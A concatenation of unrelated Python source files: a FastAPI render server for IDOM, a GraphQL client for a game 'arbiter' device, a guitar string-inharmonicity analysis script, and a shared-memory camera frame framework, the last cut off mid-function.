                f"{url_prefix}/client",
                StaticFiles(
                    directory=str(IDOM_CLIENT_BUILD_DIR.get()),
                    html=True,
                    check_dir=True,
                ),
                name="idom_static_files",
            )

            if config["redirect_root_to_index"]:

                @app.route(f"{url_prefix}/")
                def redirect_to_index(request: Request) -> RedirectResponse:
                    return RedirectResponse(
                        f"{url_prefix}/client/index.html?{request.query_params}"
                    )

    def _run_application(
        self,
        config: Config,
        app: FastAPI,
        host: str,
        port: int,
        args: Tuple[Any, ...],
        kwargs: Dict[str, Any],
    ) -> None:
        """Create the uvicorn server (kept on ``self`` so stop() can reach it)
        and run it in the current thread."""
        self._server = UvicornServer(
            UvicornConfig(app, host=host, port=port, loop="asyncio", *args, **kwargs)
        )
        _run_uvicorn_server(self._server)

    def _run_application_in_thread(
        self,
        config: Config,
        app: FastAPI,
        host: str,
        port: int,
        args: Tuple[Any, ...],
        kwargs: Dict[str, Any],
    ) -> None:
        # uvicorn does the event loop setup for us
        self._run_application(config, app, host, port, args, kwargs)

    async def _run_dispatcher(
        self,
        send: SendCoroutine,
        recv: RecvCoroutine,
        params: Dict[str, Any],
    ) -> None:
        """Run a fresh per-connection dispatcher until the socket closes."""
        async with self._make_dispatcher(params) as dispatcher:
            await dispatcher.run(send, recv, None)

    def _make_dispatcher(self, params: Dict[str, Any]) -> AbstractDispatcher:
        """Build a dispatcher over a Layout of the root component."""
        return self._dispatcher_type(Layout(self._root_component_constructor(**params)))
class PerClientStateServer(FastApiRenderServer):
    """Each client view will have its own state."""

    # Every websocket connection gets its own dispatcher (and layout).
    _dispatcher_type = SingleViewDispatcher
class SharedClientStateServer(FastApiRenderServer):
    """All connected client views will have shared state."""

    _dispatcher_type = SharedViewDispatcher
    # The single dispatcher instance shared by every connection; created on
    # app startup, torn down on shutdown.
    _dispatcher: SharedViewDispatcher

    def _setup_application(self, config: Config, app: FastAPI) -> None:
        # Tie the shared dispatcher's lifetime to the app lifecycle.
        app.on_event("startup")(self._activate_dispatcher)
        app.on_event("shutdown")(self._deactivate_dispatcher)
        super()._setup_application(config, app)

    async def _activate_dispatcher(self) -> None:
        self._dispatcher = cast(SharedViewDispatcher, self._make_dispatcher({}))
        await self._dispatcher.start()

    async def _deactivate_dispatcher(self) -> None:  # pragma: no cover
        # this doesn't seem to get triggered during testing for some reason
        await self._dispatcher.stop()

    async def _run_dispatcher(
        self,
        send: SendCoroutine,
        recv: RecvCoroutine,
        params: Dict[str, Any],
    ) -> None:
        # Per-client view parameters are meaningless when state is shared.
        if params:
            msg = f"SharedClientState server does not support per-client view parameters {params}"
            raise ValueError(msg)
        await self._dispatcher.run(send, recv, uuid.uuid4().hex, join=True)
def _run_uvicorn_server(server: UvicornServer) -> None:
    """Run *server* the way uvicorn's own entry point would.

    Copied from the uvicorn source with minimal modification -- there is no
    supported way to keep a handle on the server instance so it can be
    stopped later.
    BUG: https://github.com/encode/uvicorn/issues/742
    """
    config = server.config
    app_is_instance = not isinstance(server.config.app, str)
    if app_is_instance and (config.reload or config.workers > 1):  # pragma: no cover
        error_logger = logging.getLogger("uvicorn.error")
        error_logger.warning(
            "You must pass the application as an import string to enable 'reload' or "
            "'workers'."
        )
        sys.exit(1)

    if config.should_reload:  # pragma: no cover
        reload_supervisor = ChangeReload(
            config, target=server.run, sockets=[config.bind_socket()]
        )
        reload_supervisor.run()
    elif config.workers > 1:  # pragma: no cover
        worker_supervisor = Multiprocess(
            config, target=server.run, sockets=[config.bind_socket()]
        )
        worker_supervisor.run()
    else:
        import asyncio

        asyncio.set_event_loop(asyncio.new_event_loop())
        server.run()
|
settings.py | import sys
from network import getSocket, serialNumber
from signal import pause
from time import sleep
from threading import Thread
#
# NOTE: it is intentional that we only have one zone per arbiter
# While it is possible to have the arbiter control multiple
# emitters, which indeed it will for some situations,
# having multiple zone control would make game configuration harder
# and also we want to avoid laying tons of wiring just to save on
# 15 dollars of additional hardware.
#
def callback(_id, data):
    """Print a subscription update received from the overmind.

    BUG FIX: the original printed the builtin ``id`` (a function object)
    instead of the ``_id`` parameter.
    """
    print(_id)
    print(data)
def updateChannel(name, totemId, status, type):
    """Report one arbiter channel's state to the overmind via GraphQL.

    :param name: channel name
    :param totemId: id of the totem attached to the channel (or None)
    :param status: ArbiterChannelStatus value
    :param type: ArbiterChannelType value (parameter name shadows the
        builtin but is kept for backward compatibility with callers)
    """
    query = """
    mutation update_arbiter_channel($arbiterId: ID!, $name: String!,
        $type: ArbiterChannelType, $status: ArbiterChannelStatus, $totemId: ID) {
        update_arbiter_channel(arbiterId: $arbiterId, name: $name, type: $type,
            status: $status, totemId: $totemId) {
            id
        }
    }
    """
    try:
        ws = getSocket()
        ws.query(query, variables={
            'arbiterId': serialNumber,
            'name': name,
            'totemId': totemId,
            'status': status,
            'type': type,
        })
    except Exception as error:
        # BUG FIX: the original read ``value.filename``/``value.strerror``,
        # attributes that exist only on OSError, so any other failure raised
        # a second AttributeError inside the handler (and the bare
        # ``except:`` also swallowed KeyboardInterrupt/SystemExit).
        print('Error updating channel: %s' % (error,))
        print("ERROR: Unable to update channel with overmind")
def registerArbiter():
    """Register this arbiter (by serial number) with the overmind."""
    query = """
    mutation register_arbiter_settings($id: ID!) {
        register_arbiter_settings(id: $id) {
            id
            zoneType
        }
    }
    """
    try:
        ws = getSocket()
        ws.query(query, variables={'id': serialNumber})
    except Exception as error:
        # BUG FIX: as in updateChannel, the original assumed an OSError and
        # crashed with AttributeError on any other exception type; it also
        # used a bare ``except:``.
        print('Error registering arbiter: %s' % (error,))
        print("ERROR: Unable to register arbiter with overmind")
def subscribeSettings():
    """Start a background thread that keeps a settings subscription open
    against the overmind, reconnecting forever on any failure."""
    def monitor():
        while(True):
            print("Settings - Connecting to Overmind")
            ws = None
            try:
                ws = getSocket()
                query = """
                subscription ArbiterSettingsUpdated($id: ID!) {
                    arbiter_settings_updated(id: $id) {
                        id
                        zoneType
                    }
                }
                """
                ws.subscribe(query,\
                    variables={'id': serialNumber},\
                    callback=callback)
                print("Settings - Connected to Overmind")
                # block this thread and do nothing unless the connection
                # is lost
                while(True):
                    # we are reaching into the underlying implementation here.
                    # this is cause the graphql library doesn't have an api
                    # to see if it's died or not.
                    if not ws._connection.connected:
                        raise Exception("Settings - Lost connection with Overmind");
                    sleep(1)
            except:
                print("ERROR: Unable get settings from overmind, is it online?")
            finally:
                if ws != None:
                    ws.close()
                # retry every 5 seconds
                sleep(5)
                print("Settings - Re-connecting to Overmind")
    thread = Thread(target=monitor)
    thread.start()
|
n_tonos.py | import jams
from pathlib import Path
import matplotlib.pyplot as plt
import itertools
import numpy as np
import configparser
import os, sys
import argparse
from GuitarTrain import GuitarSetTrainWrapper
import threading
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
cur_path = Path(BASE_PATH + '/src/')
sys.path.append(str(cur_path))
from track_class import *
from Inharmonic_Detector import *
from inharmonic_Analysis import *
from constants_parser import Constants
import genetic
from helper import listen_to_the_intance
import statistics
import warnings
warnings.filterwarnings("ignore")
from GuitarSetTest import read_tablature_from_GuitarSet
import pickle
def get_annos_for_separate_strings(data, annotation_name, constants : Constants):
    """Load annotations for one audio channel and wrap both as instances.

    Returns a (TrackInstance, Annotations) pair; each note tuple carries 6
    as its string index (meaning "undetected") until detection runs.
    """
    annotations = read_tablature_from_GuitarSet(annotation_name, constants)
    onset_tuples = [
        (note.onset, note.fundamental, 6)
        for note in annotations.tablature.tablature
    ]
    tablature = Tablature(onset_tuples, data, constants)
    return TrackInstance(tablature, data, constants), annotations
def compute_track_betas(track_instance : TrackInstance, annotations : Annotations, constants : Constants, StrBetaObj, channel):
    """Detect the string for every note on one channel and accumulate the
    measured inharmonicity coefficients into the global ``betas`` table."""
    global betas
    global median_betas
    def close_event():  # https://stackoverflow.com/questions/30364770/how-to-set-timeout-to-pyplot-show-in-matplotlib
        plt.close()  # timer calls this function after 3 seconds and closes the window
    """Inharmonic prediction of tablature for eachstring/channel separately """
    for tab_instance, annos_instance in zip(track_instance.tablature.tablature, annotations.tablature.tablature):
        # Only process notes annotated for the requested string/channel.
        if annos_instance.string != channel:
            continue
        ToolBoxObj = ToolBox(partial_tracking_func=compute_partials, inharmonicity_compute_func=compute_inharmonicity, partial_func_args=[constants.no_of_partials, tab_instance.fundamental/2, constants, StrBetaObj], inharmonic_func_args=[])
        note_instance = NoteInstance(tab_instance.fundamental, tab_instance.onset, tab_instance.note_audio, ToolBoxObj, track_instance.sampling_rate, constants)
        Inharmonic_Detector.DetectString(note_instance, StrBetaObj, constants.betafunc, constants)
        tab_instance.string = note_instance.string  # predicted string
        if note_instance.string != 6:  # 6 marks "no string detected"
            # print("found!!")
            tab_instance.fret = Inharmonic_Detector.hz_to_midi(note_instance.fundamental) - constants.tuning[note_instance.string]
            # NOTE(review): indexed by the *annotated* string but the
            # *predicted* fret -- confirm this mix is intentional.
            betas[annos_instance.string, tab_instance.fret].append(note_instance.beta)
        if constants.plot:
            # Play the note audio while showing the plots for 3 seconds.
            x = threading.Thread(target=listen_to_the_intance, args=(tab_instance.note_audio,))
            x.start()
            fig = plt.figure(figsize=(15, 10))
            timer = fig.canvas.new_timer(interval = 3000)  # creating a timer object and setting an interval of 3000 milliseconds
            timer.add_callback(close_event)
            ax1 = fig.add_subplot(2, 1, 1)
            ax2 = fig.add_subplot(2, 1, 2)
            peak_freqs = [partial.frequency for partial in note_instance.partials]
            peaks_idx = [partial.peak_idx for partial in note_instance.partials]
            note_instance.plot_partial_deviations(lim=30, res=note_instance.abc, ax=ax1, note_instance=note_instance, annos_instance=annos_instance, tab_instance=tab_instance)  # , peaks_idx=Peaks_Idx)
            note_instance.plot_DFT(peak_freqs, peaks_idx, lim=30, ax=ax2)
            timer.start()
            plt.show()
def compute_all_betas(constants : Constants, StrBetaObj):
    """ function that runs tests on the jams files mentioned in the given file
    and plots the confusion matrixes for both the genetic and inharmonic results."""
    print()
    print("Starting computation...")
    lines = os.listdir(constants.dataset_names_path+'/data/audio')
    for count, name in enumerate(lines):
        # Only the hex (6-channel) cleaned solo takes are processed.
        if '_hex_cln.' not in name:
            continue
        if '_solo' not in name:
            continue
        print(name)
        track_name = name
        # Derive the jams annotation name: drop the extension, then the
        # trailing '_hex_cln' (8 characters), then append '.jams'.
        name = name.split('.')[0]
        name = name[:-8] + '.jams'
        print(name, count,'/',len(lines))
        """ load 6-channel track and annotations"""
        track_name = Path(constants.track_path + track_name)
        annotation_name = Path(constants.annos_path + name)
        multi_channel_data, _ = librosa.core.load(track_name, constants.sampling_rate, mono=False) # _ cause dont need to reassign sampling rate
        """ loop over each channel in order to compute betas for separate and debleeded note instances """
        for channel in range(6):
            data = multi_channel_data[channel,:]
            try:
                track_instance, annotations = get_annos_for_separate_strings(data, annotation_name, constants)
                compute_track_betas(track_instance, annotations, constants, StrBetaObj, channel)
            except Exception as e:
                # Best effort: a bad take/channel is reported and skipped.
                print(e)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('config_path', type=str)
    parser.add_argument('workspace_folder', type=str)
    parser.add_argument('-plot', action='store_true')
    parser.add_argument('-compute', action='store_true')
    parser.add_argument('-train', action='store_true')
    args = parser.parse_args()
    try:
        constants = Constants(args.config_path, args.workspace_folder)
    except Exception as e:
        print(e)
    try:
        os.mkdir('./results')
    except Exception as e:
        print('GootToKnow:', e)
    # HARDWIRE CONSTANTS
    constants.plot = args.plot
    print('Check if you are OK with certain important configuration constants:')
    print('****************************')
    print('train_mode:', constants.train_mode)
    print('train_frets:', constants.train_frets)
    print('polyfit:', constants.polyfit)
    print('dataset_names_path:', constants.dataset_names_path)
    print('****************************')
    print()
    StringNames = ['E', 'A', 'D', 'G', 'B', 'e']
    # betas[s, n]: list of measured beta values for string s, fret n.
    betas = np.array([[None]*20]*6)
    for s in range(6):
        for n in range(20):
            betas[s,n] = []
    median_betas = np.array([[None]*20]*6)
    if args.train:
        StrBetaObj = GuitarSetTrainWrapper(constants)
    else:
        with open('data/train/StrBetaObj.pickle', 'rb') as file:
            StrBetaObj = pickle.load(file)
    if args.compute:
        compute_all_betas(constants, StrBetaObj)
        # Reduce each (string, fret) cell to its median and persist it.
        for s in range(6):
            for n in range(20):
                if betas[s,n]: # not None
                    median_betas[s,n] = statistics.median(betas[s,n])
        np.savez("./results/n_tonos.npz", median_betas=median_betas)
    npzfile = np.load('./results/n_tonos.npz', allow_pickle=True) # allow_pickle is needed because dtype=object, since None elements exist.
    median_betas = npzfile['median_betas']
    nf=13
    for s in range(6):
        # 6*log2 of the beta ratio expresses fret position in semitones.
        diff = np.log2(median_betas[s,:nf].astype(np.float64))-np.log2(median_betas[s,0].astype(np.float64))
        plt.plot(range(nf), 6*diff, label=StringNames[s], linewidth=1.75, alpha=0.85)
    plt.plot(range(nf+1), range(nf+1), label='y=x', linestyle='dashed', color='black')
    plt.xticks(range(1,20))
    plt.yticks(range(1,14))
    plt.xlim(-0.1,20)
    plt.ylim(-0.1,20)
    plt.grid()
    plt.xlabel('n')
    plt.ylabel(r'$6 \cdot \log_2(\hat{\beta}_{s,med}(n)/\hat{\beta}_{s,med}(0))$')
    plt.legend()
    plt.savefig('./results/n_tonos.png', bbox_inches='tight')
    plt.show()
plt.show() |
camera_message_framework.py | import struct
import threading
import time
import numpy as np
from collections import namedtuple, OrderedDict
from ctypes import POINTER, c_ubyte, c_uint32, c_uint64, c_char_p, c_voidp, c_ssize_t, c_bool, c_int32, addressof, Structure, create_string_buffer
from functools import reduce
import operator
from auv_python_helpers import load_library
# Return values of _lib.read_frame
FRAMEWORK_QUIT = 1
FRAMEWORK_DELETED = 2
class _Frame(Structure):
    # ctypes mirror of the C frame struct filled in by _lib.read_frame.
    _fields_ = [('data', POINTER(c_ubyte)),   # pointer into the shared buffer
                ('last_frame', c_uint32),
                ('width', c_ssize_t),
                ('height', c_ssize_t),
                ('depth', c_ssize_t),
                ('acq_time', c_uint64)]       # acquisition time in milliseconds
_lib_nothread = load_library('libauv-camera-message-framework.so')
# Declare ctypes signatures for the C API so pointer/size arguments and
# return values round-trip correctly on 64-bit platforms.
_lib_nothread.create_message_framework_from_cstring.argtypes = (c_char_p, c_ssize_t)
_lib_nothread.create_message_framework_from_cstring.restype = c_voidp
_lib_nothread.access_message_framework_from_cstring.argtypes = (c_char_p,)
_lib_nothread.access_message_framework_from_cstring.restype = c_voidp
_lib_nothread.cleanup_message_framework.argtypes = (c_voidp,)
_lib_nothread.cleanup_message_framework.restype = None
_lib_nothread.kill_message_framework.argtypes = (c_voidp,)
_lib_nothread.kill_message_framework.restype = None
_lib_nothread.read_frame.argtypes = (c_voidp, c_voidp)
_lib_nothread.read_frame.restype = c_int32
_lib_nothread.write_frame.argtypes = (c_voidp, c_voidp, c_uint64,
                                      c_ssize_t, c_ssize_t, c_ssize_t)
_lib_nothread.write_frame.restype = c_bool
_lib_nothread.get_buffer_size.argtypes = (c_voidp,)
_lib_nothread.get_buffer_size.restype = c_ssize_t
# Module-wide run flag; Accessor constructors poll while this is True.
running = True
# if we're currently running in an eventlet context (i.e. from the GUI)
# use a proxy for lib. this makes lib calls run in a thread pool, instead
# of entirely blocking the eventlet cooperative threads
is_patched = 'eventlet' in threading.current_thread.__module__
if is_patched:
    from vision import resizable_eventlet_tpool as tpool
    tpool.setup()
    _lib = tpool.Proxy(_lib_nothread)
else:
    _lib = _lib_nothread
class ExistentialError(Exception):
    # Raised when a shared-memory framework cannot be created/found as
    # expected (see the Creator contract below).
    pass
class StateError(Exception):
    # Raised when an accessor is used in an invalid state, e.g. after
    # cleanup() or before any frame has been read.
    pass
# Structure that represents an accessor to a shared memory block. Creating an
# accessor will block until the shared memory block with the specified name is
# created
# An accessor has all of the same priviledges as a creator in terms of reading
# and writing frame
class Accessor:
def __init__(self, name):
self.name = name
self._framework = None
retrying = False
# loop until the framework actually exists
while running:
self._framework = _lib.access_message_framework_from_cstring(name.encode('utf8'))
if self._framework:
break
if not retrying:
print("Block with name {} does not exist! Waiting and retrying...".format(name))
retrying = True
time.sleep(0.5)
if retrying:
print("Found {}!".format(name))
if running:
self._setup_accessor()
def valid(self):
return self._framework
# convenience method for setting up accessor fields
# these aren't in the constructor because Creator will also want to use them
def _setup_accessor(self, framework_valid=True):
self._frame = _Frame()
self._array = None
self._last_frame = None
if framework_valid:
self.buffer_size = _lib.get_buffer_size(self._framework)
self.alive = True
def get_next_frame(self):
if not self.alive:
raise StateError('Accessor has already been cleaned up!')
frame = self._frame
ret = _lib.read_frame(addressof(frame), self._framework)
if ret != 0:
return ret
#self.cleanup()
#raise StateError('Accessor has already been cleaned up!')
shape = frame.height, frame.width, frame.depth
# don't recreate the array if we can avoid it, to mitigate numpy memory leak bug
if (self._array is None or
self._array.__array_interface__['data'][0] != addressof(frame.data.contents)):
self._array = np.ctypeslib.as_array(frame.data, shape)
elif (self._array.shape != shape and
reduce(operator.mul, self._array.shape) == reduce(operator.mul, shape)):
self._array = self._array.reshape(shape)
elif self._array.shape != shape:
self._array = np.ctypeslib.as_array(frame.data, shape)
self._last_frame = self._array, frame.acq_time
return self._last_frame
def get_last_frame(self):
if self._last_frame is None:
raise StateError()
return self._last_frame
def has_last_frame(self):
return self._last_frame is not None
def write_frame(self, frame, acq_time):
    """Write *frame* to the shared memory block.

    frame: ndarray with at most 3 dimensions, at most self.buffer_size
        bytes in total.
    acq_time: int, acquisition time in milliseconds.
    Raises StateError if cleanup() has already been called.
    """
    if not self.alive:
        raise StateError('Accessor has already been cleaned up!')
    height = width = depth = 1
    dims = frame.shape
    if len(dims) == 1:
        (width,) = dims
    elif len(dims) == 2:
        height, width = dims
    else:
        height, width, depth = dims
    # The liveness result is currently unused; a dead framework is only
    # detected on the read side.
    is_live = _lib_nothread.write_frame(self._framework, frame.ctypes.data,
                                        acq_time, width, height, depth)
def unblock(self):
    """Wake any reader blocked inside the C library, if the framework
    still exists. Safe to call after cleanup()."""
    if self._framework is not None:
        _lib.kill_message_framework(self._framework)
def cleanup(self, kill=True):
    """Tear down the framework handle. Idempotent.

    The `kill` parameter is accepted for interface compatibility but is
    currently unused — the framework is always killed before cleanup.
    """
    if self.alive:
        self.alive = False
        if self._framework is not None:
            _lib.kill_message_framework(self._framework)
            _lib.cleanup_message_framework(self._framework)
            self._framework = None
# A Creator is an accessor that first creates the framework before accessing it.
# It will raise an ExistentialError if the specified name already exists
class Creator(Accessor):
    """Accessor that creates (rather than attaches to) a named framework."""
    def __init__(self, name, max_size):
        self.name = name
        self._framework = _lib.create_message_framework_from_cstring(name.encode('utf8'), max_size)
        # NOTE(review): the framework handle is passed where _setup_accessor
        # expects the boolean framework_valid flag — it is only used for
        # truthiness, so a null/zero handle skips buffer-size/alive setup.
        self._setup_accessor(self._framework)
# Fixed width (bytes) of a CMF/option name field in the packed gui struct.
MAX_NAME_LENGTH = 100
# Fixed width (bytes) of an option's struct format-string prefix.
MAX_OPTION_FORMAT_STR_LENGTH = 64
# struct format used to (un)pack that fixed-width format-string prefix.
FORMAT_STR_FORMAT_STR = '{}s'.format(MAX_OPTION_FORMAT_STR_LENGTH)
class _OptionAccessor(Accessor):
    """Accessor for a single option CMF.

    Each frame is a fixed-width (MAX_OPTION_FORMAT_STR_LENGTH) NUL-padded
    struct format string followed by the value packed with that format.
    """
    def __init__(self, full_name):
        super().__init__(full_name)
        # The option's first frame carries its format string.
        format_str, _ = self.get_next_frame()
        self._setup_option_accessor(format_str)

    def _setup_option_accessor(self, format_str):
        """Cache *format_str* as bytes, NUL-padded to the fixed prefix width.

        Fix: the previous version only converted str -> bytes when padding
        was needed, so a format string of exactly
        MAX_OPTION_FORMAT_STR_LENGTH characters stayed a str and broke the
        bytes concatenation in set_value().
        """
        if isinstance(format_str, str):
            format_str = format_str.encode('utf8')
        self._format_str = format_str.ljust(MAX_OPTION_FORMAT_STR_LENGTH, b'\0')

    def get_next_frame(self):
        """Return (format_str, value_tuple), or an int status code on error."""
        res = super().get_next_frame()
        if isinstance(res, int):
            # Status code from the library; pass through unchanged.
            return res
        frame, _ = res
        self._last_frame = frame
        return self.get_last_frame()

    def get_last_frame(self):
        """Decode the cached frame into (format_str, value_tuple).

        Raises StateError if no frame has been read yet.
        """
        if not self.has_last_frame():
            raise StateError()
        # tobytes() replaces the deprecated tostring() alias (removed in
        # numpy 2.0); identical output.
        bstr = self._last_frame.tobytes()
        format_bstr = bstr[:MAX_OPTION_FORMAT_STR_LENGTH]
        format_str, = struct.unpack_from(FORMAT_STR_FORMAT_STR, format_bstr)
        value = struct.unpack_from(format_str, bstr[MAX_OPTION_FORMAT_STR_LENGTH:])
        format_str = _char_arr_to_str(format_str).decode('utf8')
        return format_str, value

    def set_value(self, values):
        """Pack *values* with this option's format string and publish them.

        str elements are encoded as UTF-8 bytes before packing.
        """
        byteify = lambda v: bytes(v, 'utf8') if isinstance(v, str) else v
        value_str = struct.pack(self._format_str, *map(byteify, values))
        # frombuffer replaces the deprecated fromstring(); write_frame only
        # reads the buffer, so the read-only view is sufficient.
        narr = np.frombuffer(self._format_str + value_str, dtype=np.uint8)
        self.write_frame(narr, int(time.time()*1000))
class _OptionCreator(_OptionAccessor, Creator):
    """Creator-side counterpart of _OptionAccessor: creates the option CMF
    sized for the fixed-width format prefix plus the packed value."""
    def __init__(self, full_name, format_str):
        # Deliberately skips _OptionAccessor.__init__ (which would block
        # reading the first frame) and initializes the format directly.
        Creator.__init__(self, full_name, MAX_OPTION_FORMAT_STR_LENGTH + struct.calcsize(format_str))
        self._setup_option_accessor(format_str)
# Capacity limits for the fixed-size module (gui) frame below.
MAX_NUM_POSTED_IMAGES = 256
MAX_NUM_OPTIONS = 256
# Gui struct format:
# Number of images (ubyte)
# Number of options (ubyte)
# Location of images (MAX_NAME_LENGTH*MAX_NUM_POSTED_IMAGES bytes)
# Location of options (MAX_NAME_LENGTH*MAX_NUM_OPTIONS bytes)
_gui_struct = struct.Struct('BB{}s{}s'.format(MAX_NAME_LENGTH*MAX_NUM_POSTED_IMAGES,
                                              MAX_NAME_LENGTH*MAX_NUM_OPTIONS))
# convenience method to remove null characters from the end of a string
def _char_arr_to_str(arr):
try:
first_null = arr.index(b'\0')
return arr[:first_null]
except Exception as e:
return arr
# convenience method to unpack {num} names from {arr}
def _unpack_names(arr, num):
    """Slice *num* fixed-width (MAX_NAME_LENGTH) name fields from *arr*,
    stripping NUL padding from each."""
    return [_char_arr_to_str(arr[i * MAX_NAME_LENGTH:(i + 1) * MAX_NAME_LENGTH])
            for i in range(num)]
# convenience method to turn a string representing a gui_struct into a tuple
# consisting of (image_names, option_names)
def _gui_struct_to_gui_tuple(s):
    """Unpack a packed gui frame into ([image names], [option names]),
    both as lists of str."""
    num_images, num_options, im_arr, options_arr = _gui_struct.unpack(s)
    image_names = [name.decode('utf8') for name in _unpack_names(im_arr, num_images)]
    option_names = [name.decode('utf8') for name in _unpack_names(options_arr, num_options)]
    return image_names, option_names
def _construct_gui_shm_name(module_name, value_name, is_option):
name = '{}_{}'.format(module_name, value_name)
if is_option:
name += '_option'
return name
# Accessor representing a module, containing utility functions for posted
# images, options, etc
class ModuleFrameworkAccessor(Accessor):
    """Attaches to a module framework ('module-<module_name>') and fans its
    contents out to observers.

    Each frame of the module framework is a packed _gui_struct naming the
    module's posted images and options. A background thread watches the
    module frame, creates per-image/per-option accessors as new names
    appear, and spawns a watcher thread per accessor that forwards every
    new value to registered observers.
    """
    def __init__(self, module_name):
        Accessor.__init__(self, 'module-' + module_name)
        # Optional callback fired when the underlying framework is deleted.
        self.cmf_deletion_callback = None
        self._setup_module_framework(module_name)
    def _setup_module_framework(self, module_name):
        """Initialize bookkeeping and start the module-frame observer
        thread. Also called by ModuleFrameworkCreator.__init__."""
        self._lock = threading.RLock()
        self._option_accessors = OrderedDict()
        self._image_accessors = {}
        self._image_observers = []
        self._option_observers = []
        self.ordered_image_names = []
        self.ordered_option_names = []
        self._module_name = module_name
        self.threads = []
        t = threading.Thread(target=self._observe_forever)
        t.start()
        self.threads.append(t)
    def _watch_option(self, option_name, option):
        """Thread body: forward each new value of *option* to observers."""
        # since an option consumes one of its own frames when it initializes
        # itself, we need to notify all watchers of the first frame manually
        if option.has_last_frame():
            first_option_value = option.get_last_frame()
            with self._lock:
                for observer in self._option_observers:
                    observer(option_name, first_option_value)
        # `running` is a module-level shutdown flag defined outside this
        # excerpt — presumably cleared on exit; TODO confirm.
        while running and option_name in self._option_accessors:
            try:
                prev_value = option.get_last_frame()
            except:
                prev_value = None
            next_value = option.get_next_frame()
            if isinstance(next_value, int):
                break  # status code: framework closed or deleted
            if prev_value == next_value:
                continue  # suppress duplicate notifications
            if option_name not in self._option_accessors:
                break
            time.sleep(0)  # yield before taking the lock
            with self._lock:
                for observer in self._option_observers:
                    observer(option_name, next_value)
            time.sleep(0)
    def _watch_image(self, image_name, image):
        """Thread body: forward each new frame of *image* to observers."""
        while running and image_name in self._image_accessors:
            res = image.get_next_frame()
            if isinstance(res, int):
                break  # status code: framework closed or deleted
            next_value, acq_time = res
            if image_name not in self._image_accessors:
                break
            time.sleep(0)
            with self._lock:
                for observer in self._image_observers:
                    observer(image_name, (next_value, acq_time))
            time.sleep(0)
    def _observe_forever(self):
        """Thread body: watch the module frame and keep the per-name
        accessor dicts (and their watcher threads) in sync with it."""
        while running:
            res = self.get_next_frame()
            if isinstance(res, int):
                if res == FRAMEWORK_DELETED and self.cmf_deletion_callback is not None:
                    self.cmf_deletion_callback()
                break
            frame, _ = res
            bstr = frame.tostring()
            image_names, option_names = _gui_struct_to_gui_tuple(bstr)
            self.ordered_image_names = image_names
            self.ordered_option_names = option_names
            # TODO store image and option indices with Accessor
            def update_watchers(names, accessor_dict, accessor_constructor,
                                is_option):
                # dict_cp tracks the names we have _not_ seen, to be removed
                # after we add new names
                dict_cp = accessor_dict.copy()
                for name in names:
                    if not name:
                        continue  # skip empty (padding) entries
                    if name not in accessor_dict:
                        accessor_name = _construct_gui_shm_name(self._module_name,
                                                                name, is_option)
                        accessor = accessor_constructor(accessor_name)
                        accessor_dict[name] = accessor
                        if is_option:
                            target=self._watch_option
                        else:
                            target=self._watch_image
                        t = threading.Thread(target=target, args=(name, accessor))
                        t.start()
                    else:
                        del dict_cp[name]
                for name_to_del in dict_cp:
                    # this is plagues by timing issues with creators - e.g. the
                    # creator will create two options, but this read will only
                    # pick up the first, deleting the second from the dict.
                    # This might be fixable with better usage of locks (how?),
                    # but for now I'm commenting out the deletion, which would
                    # not give us any notable performance increase anyway
                    #del accessor_dict[name_to_del]
                    pass
            time.sleep(0)
            with self._lock:
                update_watchers(image_names, self._image_accessors, Accessor,
                                False)
                update_watchers(option_names, self._option_accessors,
                                _OptionAccessor, True)
            time.sleep(0)
    def _register_observer(self, observer, observer_list, accessors_dict,
                           notify_with_current_values):
        """Append *observer* and optionally replay each accessor's last
        known value to it."""
        time.sleep(0)
        with self._lock:
            observer_list.append(observer)
            if notify_with_current_values:
                for name in accessors_dict:
                    accessor = accessors_dict[name]
                    if not accessor.has_last_frame():
                        continue
                    last_accessor_value = accessor.get_last_frame()
                    observer(name, last_accessor_value)
    def register_image_observer(self, image_observer,
                                notify_with_current_values=True):
        """Register callback(name, (array, acq_time)) for posted images."""
        self._register_observer(image_observer, self._image_observers,
                                self._image_accessors, notify_with_current_values)
    def register_option_observer(self, option_observer,
                                 notify_with_current_values=True):
        """Register callback(name, (format_str, value)) for options."""
        self._register_observer(option_observer, self._option_observers,
                                self._option_accessors, notify_with_current_values)
    def write_image(self, image_name, image, acq_time):
        """Write *image* to the named image CMF (KeyError if unknown)."""
        self._image_accessors[image_name].write_frame(image, acq_time)
    def write_option(self, option_name, value):
        """Pack and write *value* to the named option CMF."""
        self._option_accessors[option_name].set_value(value)
    def get_option_values(self):
        """Snapshot {option_name: (format_str, value)} of last-known values.
        Raises StateError if an option has no frame yet (the guarding
        try/except was deliberately commented out)."""
        option_values = {}
        for option_name in self._option_accessors:
            #try:
            option_values[option_name] = self._option_accessors[option_name].get_last_frame()
            #except:
            #    continue
        return option_values
    def get_images(self):
        """Snapshot {image_name: array} of last-known images.
        Raises StateError if an image has no frame yet."""
        images = {}
        for image_name, accessor in self._image_accessors.items():
            #try:
            images[image_name] = accessor.get_last_frame()[0]
            #except:
            #    continue
        return images
    def _get_all_CMFs(self):
        """All child option and image accessors."""
        return list(self._option_accessors.values()) + \
            list(self._image_accessors.values())
    def unblock(self):
        """Unblock all child CMFs, then the module framework itself."""
        for CMF in self._get_all_CMFs():
            CMF.unblock()
        super().unblock()
    def register_cmf_deletion_callback(self, f):
        """Set the callback invoked when the module framework is deleted."""
        self.cmf_deletion_callback = f
def _safe_key_wrapper(k):
def get(x):
try:
return k(x)
except:
return -1
return get
class ModuleFrameworkCreator(ModuleFrameworkAccessor, Creator):
    """Creator side of a module framework: owns the module frame plus the
    per-image/option Creator CMFs, and republishes the packed name lists
    whenever contents or ordering change."""
    def __init__(self, module_name):
        Creator.__init__(self, 'module-' + module_name, _gui_struct.size)
        self._setup_module_framework(module_name)
        # Sort keys for the published name lists; replaced via the
        # set_*_ordering setters (which wrap them in _safe_key_wrapper).
        self._image_ordering = lambda x: x
        self._option_ordering = lambda x: 0
    def _update(self):
        """Pack the current, ordered image/option name lists into a
        _gui_struct frame and publish it on the module framework."""
        # NUL-pad each name to the fixed MAX_NAME_LENGTH field width.
        name_struct_gen = lambda name: '{{:\0<{}}}'.format(MAX_NAME_LENGTH).format(name)
        image_keys = sorted(self._image_accessors.keys(), key=self._image_ordering)
        image_names = map(name_struct_gen, image_keys)
        option_keys = sorted(self._option_accessors.keys(), key=self._option_ordering)
        option_names = map(name_struct_gen, option_keys)
        image_name_str = ''.join(image_names)
